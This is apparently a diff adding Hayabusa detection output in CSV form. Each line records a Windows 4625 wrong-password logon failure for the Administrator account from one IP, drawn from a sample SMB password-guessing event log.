+2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ctbv73J0Dot9raD0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wKpWApJIKkjbtaPB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kVTAv9VoNpUyxQFM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xb3t1dpuk9JZri5p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fy0UrW8TWrxAOX90  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iUXUbUsiE6Ahh9iD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2QQdQ6rQYLBf15AF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zG4eJLuQ4u2dKQG0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QCfwHs2gVGiRc3Fy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 67TcwQfTxgTtQvCU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: imnSPKAKYzrCKSUf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mMNbdjiXNUY0gTfB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zOAH0gjfs8JcXSMO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TnnB4KPBiDvKMsUL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0aZRgpa5riqIEWhQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BBL4nrs7f6cjlfsT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fgDupzqipe5jK0r5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5yPcTOWPuN8efJtl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dszb6s0w6glvSkSw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ynu936pVVAuDUGT5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c55o3Dca2tiUVwb2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tnDmp2KK02LyJ7Xm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xRUKrHDAmgEPcjQw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PCGKDvPhzg6BlsuU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OU28biGLJkFmB117  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 029LphuWcoo9S2hL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ItIROqP2wyzLJa9s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XngGun3HYopTkcrA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c91Qz5QNUczcm7m6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t7nyWJJJhDiqnf1d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bnj7hAp20gZE9FCe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FydQjBxO7XninU5Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3P8InIzyD86BXr1d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wvKGa3A3qw7s0cZX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QTY7tRVEMjXZXFyH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m4Ij1NSYGYbq4PxS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 47fOxZAYhjxLzEoU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aGxXaNNChVScbHe6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jTcVeB8f2Rs3Bldo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yeSnUlIbuDVNffey  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eXIM4tWru1x0AahJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m2pBLn6aO8L4kiH5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EG5daDsgTMZsNg0T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3V8z6j7GLO3ywBXc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AsezMvhUNedLNqg4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h16AvUVZG8qch7LC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PB5xe3Aieya8N3IU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ezGXIhYrkk2Q9pe5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VSGIVhD6pO5z47DY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2vEjOhJW9G3aIfV0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hyvCpW3aOZqCOldu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oyhS2wAAkfmZuLll  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0bEh0KTMbbFtsfck  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mw9u61efa06vYv6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SAxij8QYLxxriIvu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HK2tbzICSpTrglud  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4rHJ70VrEwCQjSvL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8qwZT66ExkdJDZaT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ezuHluj1fEC9KdQ1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bXH5uDfo4WB6QEnQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yWvZjuZhnGcrelOM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vb6ePjmpA8ZwK1PW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7e1A9ZY20WM8oDn6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 71GKLnXqSEEuc1Fw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w0GsW0vDEkpRa1X0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0HH6zUUoL0qlfFC2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AG4pYsjob1iwlOc0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dNCX5tZ0nF1foTLW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vO82Kb0kboVFuJy6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DptE2C8ZK3AxCb43  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NC8manvVP5pU8F3N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m00bI5welsLUWmwJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
